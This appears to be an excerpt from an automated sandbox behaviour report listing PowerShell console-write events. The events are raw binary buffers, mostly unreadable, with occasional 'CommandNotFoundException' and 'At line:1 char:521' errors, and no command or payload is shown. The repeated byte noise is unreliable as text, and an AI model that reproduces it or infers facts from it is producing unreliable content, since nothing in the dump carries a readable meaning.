Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....S................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....S................Hxk....................................}..v.... .......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w...._................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w...._................Hxk....................................}..v.... .......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....k................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....k................Hxk....................................}..v.... .......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....w................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w....w................Hxk....................................}..v.... .......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w.....................Hxk....................................}..v.... .......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w.....................Ixk......M.............................}..v....."......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w.....................Hxk.....#..............................}..v.... $......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w.....................Ixk......M.............................}..v.....*......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w.....................Hxk.....+..............................}..v.... ,......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w.....................Ixk......M.............................}..v.....2......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w.....................Hxk.....3..............................}..v.... 4......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w.....................Ixk......M.............................}..v....X9......0.......................h.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w.....................Hxk.....:..............................}..v.....:......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w.....................Ixk......M.............................}..v....XA......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w.....................Hxk.....B..............................}..v.....B......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n......F......0...............8.M.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w.....................Hxk....xG..............................}..v.....G......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Console Write: ................y=.w.....................Ixk....................................}..v....8M......0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....M..............................}..v....pN......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........Ixk......M.............................}..v.....R......0...............8.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....R..............................}..v....8S......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....`...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....`...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....H.......0.......................~.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.1.............}..v............0...............8.M.....$.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....H...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'................Hxk....H...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3................Hxk....H...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?................Hxk....H...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K................Hxk....H...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W................Ixk......M.............................}..v.....&......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W................Hxk....H'..............................}..v.....'......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c................Hxk....H/..............................}..v...../......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o................Ixk......M.............................}..v.....6......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o................Hxk....H7..............................}..v.....7......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{................Ixk......M.............................}..v.....>......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{................Hxk....H?..............................}..v.....?......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....E......0.......................h.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....E..............................}..v....8F......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................0................................wI..... .......................}..v.....M...... ...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....M..............................}..v....8N......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....hR......0...............8.M.....4.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.... S..............................}..v.....S......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....X......0.......................l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....Y..............................}..v.....Z......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........Ixk......M.............................}..v.....]......0...............8.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....`^..............................}..v.....^......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....p[......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....(\..............................}..v.....\......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....pc......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....(d..............................}..v.....d......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....j......0.......................~.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....j..............................}..v....Hk......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.1.............}..v....Xo......0...............8.M.....$.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....p..............................}..v.....p......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....Xw......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk.....x..............................}..v.....x......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....X.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....X.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....X.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+................Ixk......M.............................}..v....X.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7................Ixk......M.............................}..v....X.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....7................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C................Ixk......M.............................}..v....X.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....C................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O................Ixk......M.............................}..v....X.......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[................Ixk......M.............................}..v............0.......................h.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....0.......0...............8.M.....4.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s................Hxk....................................}..v....h.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0.......................l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....`...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........Ixk......M.............................}..v....p.......0...............8.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....(...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....(.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v....(.......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0.......................~.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....H...............................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.1.............}..v............0...............8.M.....$.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................Ixk......M.............................}..v............0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................Hxk....................................}..v............0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................Ixk......M.............................}..v....H#......0.......................h.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................Hxk.....$..............................}..v.....$......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................Ixk......M.............................}..v....H+......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................Hxk.....,..............................}..v.....,......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n......0......0...............8.M.....4.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................Hxk....h1..............................}..v.....1......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................Ixk......M.............................}..v....(7......0.......................l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................Hxk.....7..............................}..v....`8......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._....... ........Ixk......M.............................}..v.....;......0...............8.M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................Hxk.....<..............................}..v....(=......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s................Ixk......M.............................}..v.....6......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s................Hxk.....7..............................}..v.....8......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....>......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....................................}..v.....@......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v....pE......0.......................~.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....(F..............................}..v.....F......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.1.............}..v.....J......0...............8.M.....$.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....pK..............................}..v.....K......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Ixk......M.............................}..v.....R......0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................Hxk....pS..............................}..v.....S......0.................M.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v.....Z......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....p[..............................}..v.....[......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v.....b......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....pc..............................}..v.....c......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v.....j......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....pk..............................}..v.....k......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v.....r......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....ps..............................}..v.....s......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v.....z......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....p{..............................}..v.....{......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....p...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....p...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v....(.......0.......................h.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....................................}..v....`.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v....(.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....................................}..v....`.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0...............8.M.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................0................................wI..... .......................}..v............ .................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....'................Ixk......M.............................}..v............0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....'................Hxk....................................}..v....@.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....3....... ........Ixk......M.............................}..v............0...............8.M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....3................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....G................Ixk......M.............................}..v....P.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....G................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....S................Ixk......M.............................}..v....P.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....S................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w...._................Ixk......M.............................}..v............0.......................~.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w...._................Hxk....................................}..v....(.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....k.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.1.............}..v....8.......0...............8.M.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....k................Hxk....................................}..v....p.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....w................Ixk......M.............................}..v....8.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w....w................Hxk....................................}..v....p.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v....8.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....................................}..v....p.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v....8.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....................................}..v....p.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v....8.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....................................}..v....p.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v....8.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....................................}..v....p.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v....8.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....................................}..v....p.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v....8.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....................................}..v....p.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v....8.......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....................................}..v....p.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v............0.......................h.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....................................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....`...............................}..v............0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0...............8.M.....4.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....................................}..v....H.......0.................M.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Ixk......M.............................}..v............0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................y=.w.....................Hxk....@...............................}..v............0.................M.............................
